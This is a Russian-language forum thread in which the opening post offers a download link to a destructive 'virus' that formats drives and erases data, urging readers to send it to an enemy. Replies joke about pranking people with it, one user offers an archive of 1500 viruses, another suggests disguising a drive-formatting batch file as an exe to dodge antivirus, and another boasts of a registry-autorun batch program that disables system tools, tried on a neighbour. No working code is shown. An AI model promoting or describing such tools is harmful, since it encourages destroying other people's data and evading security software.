призрачный форум

www.prizrak.ws

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » www.prizrak.ws » Интернет - Безопасность! » Для Вашего недруга >>


Для Вашего недруга >>

Сообщений 1 страница 23 из 23

1

Представляю Вам вирус который сам:

• Форматирует Ваши локальные диски
• Удаляет все с компа

   Пошлите эту программу своему недругу и посмотрите что будет с его компом.

Скачать столь полезную программы можно тут.

Подпись автора

Я Хранитель Свеч на границе Тьмы Свет ковал мой меч для своей войны…


www.prizrak.ws Аниме Форум - для общения любителей аниме (японской анимации), манги и хентая. Новости, статьи по темам: безопасность, хакерство, программы. Игры и софт для WinOS, PocketPC, Linux/Unix и др. Архив игр, фильмов DVD, музыки mp3 и программного обеспечения. Теги: скачать anime, скачать мангу, скачать хентай, скачать яой, скачать юри, скачать аниме обои картинки, скачать музыку mp3, скачать фильмы dvd, скачать софт, скачать программы, скачать игры ^__^

0

2

ГЫ,а она мне комп неиспортит???

Подпись автора

ВеРнУлСя Из АдА

0

3

Baron
вот я тоже слмневаюсь

Подпись автора

Член Клуба <Антияой>
Член клуба Позити ффф

0

4

всё может быть если не уверены - не качайте! :D

Подпись автора

Я Хранитель Свеч на границе Тьмы Свет ковал мой меч для своей войны…


www.prizrak.ws Аниме Форум - для общения любителей аниме (японской анимации), манги и хентая. Новости, статьи по темам: безопасность, хакерство, программы. Игры и софт для WinOS, PocketPC, Linux/Unix и др. Архив игр, фильмов DVD, музыки mp3 и программного обеспечения. Теги: скачать anime, скачать мангу, скачать хентай, скачать яой, скачать юри, скачать аниме обои картинки, скачать музыку mp3, скачать фильмы dvd, скачать софт, скачать программы, скачать игры ^__^

0

5

prizrak
а ты пробывал??

Подпись автора

ВеРнУлСя Из АдА

0

6

prizrak написал(а):

всё может быть если не уверены - не качайте!

ну ты даешь :O

Подпись автора

просто улыбнись=)

0

7

Baron написал(а):

а ты пробывал??

нет. мне такого рода проги не нужны :)

Подпись автора

Я Хранитель Свеч на границе Тьмы Свет ковал мой меч для своей войны…


www.prizrak.ws Аниме Форум - для общения любителей аниме (японской анимации), манги и хентая. Новости, статьи по темам: безопасность, хакерство, программы. Игры и софт для WinOS, PocketPC, Linux/Unix и др. Архив игр, фильмов DVD, музыки mp3 и программного обеспечения. Теги: скачать anime, скачать мангу, скачать хентай, скачать яой, скачать юри, скачать аниме обои картинки, скачать музыку mp3, скачать фильмы dvd, скачать софт, скачать программы, скачать игры ^__^

0

8

Вирус элементарно тормозится любым антивирусом. По крайней мере я ставил эксперимент на Nod32, Panda и Norton

0

9

Мужики вы извените но такой долбаебизм прятать ссылки на скачивание!

Код:
<div class="post-body">
	<div class="post-box">
<div class="post-content">
<p><div align="center">Представляю Вам вирус который сам:</div><br />• Форматирует Ваши локальные диски<br />• Удаляет все с компа</p>
<p>   Пошлите эту программу своему недругу и посмотрите что будет с его компом.</p>

<p>Скачать столь полезную программы можно <a href="https://prizrak.bbok.ru/click.php?https://www.rapidshare.ru/394555" rel="nofollow (rel="nofollow")" target="_blank">тут</a>.</p>
<dl class="post-sig"><dt><span>Подпись автора</span></dt><dd><p><span style="color: blue"><em>На свете много демонов, но лишь у меня ангельские крылья...<br />---------<br />Я Хранитель Свеч на границе Тьмы <br />Свет ковал мой меч для своей войны…</em></span><br /><span style="font-size: 8px"><span style="color: blue">Член Клуба</span><span style="color: red"> &lt;Антияой&gt;</span></span></p></dd></dl>
</div>

<div class="post-rating"><p class="container" style="float:right;border:0;padding:3px"><a title="Рейтинг сообщения / Вы не можете голосовать" style="text-decoration:none;font-size:130%;cursor:pointer" rel="nofollow (rel="nofollow")">0</a></p></div>
	</div>
	<div class="clearer"><!-- --></div>
</div>

-1

10

Ошибка: Файл был удален по истечении максимального срока хранения.

А жаль)) Хотел бы посмотреть, что там за чудо))

Подпись автора

"Не бывает атеистов в окопах под огнем"

0

11

Есть легенда про вирус RED Square. Вирус етот убивает CRT мониторы, после его действия остается 4 чёрных пятна. Если кто то знает где его можно взять или вобще что то про него, сообщите плз...

0

12

Да чтото не качаеться! А так хотел на кемнибудь пошутить!

Подпись автора

MAXWAREZ.AT.UA Кого интересует  Счастливый фермер

0

13

Nazsas написал(а):

Да чтото не качаеться! А так хотел на кемнибудь пошутить!

эта прога не для шуток

0

14

эта прога не для шуток

Это точно.
За такую шутку и огрести можно

Подпись автора

В любом безумии таится свое ужасное веселье.© Stephen King. Pet Sematary.
Член Клуба
<К.И.М.>

0

15

Интересно было бы посмотреть его исходник принцып работы
А имя у него есть?

Подпись автора

я добрый и пушистый, только те кто это знают - долго не живут.
гы, а крутой у мну рейтинг, а то все положительные кругом.))))

0

16

:crazyfun: кароче если чё там стучите в асю дам архив с вирусами там их аж 1500 :crazy: 393021675

0

17

:crazyfun:  качает

0

18

ох ну да) легче просто забить комп чем нибудь другим вам не кажется?)

0

19

1

0

20

Админ((дай новую ссылку...плз!!!URL (ссылка) битая.....спасибо заранее...

0

21

ыы а не проще сделать батник с командами на формат всех дисков и замаскировать его под exe файл! и всё ни один антивирь не спалит. Т.к. это даже не вирус получается)

0

22

я делал с помощью батника маленькое чудо после запуска которого создаётся по 5тыс папок в моих документах на рабочем и на диске С и  D +блокируется поиск,скрытые файлы,диспетчер задач,реестр,и ещё немного всяких пречендалов) Этот "вирус" заносится через реестр в автозапуск и попробуй удали) в реестр не залезеш)) Проверено на Соседе))))))

0

23

cyber-01 ну  и "умный"

Подпись автора

просто улыбнись=)

0


Вы здесь » www.prizrak.ws » Интернет - Безопасность! » Для Вашего недруга >>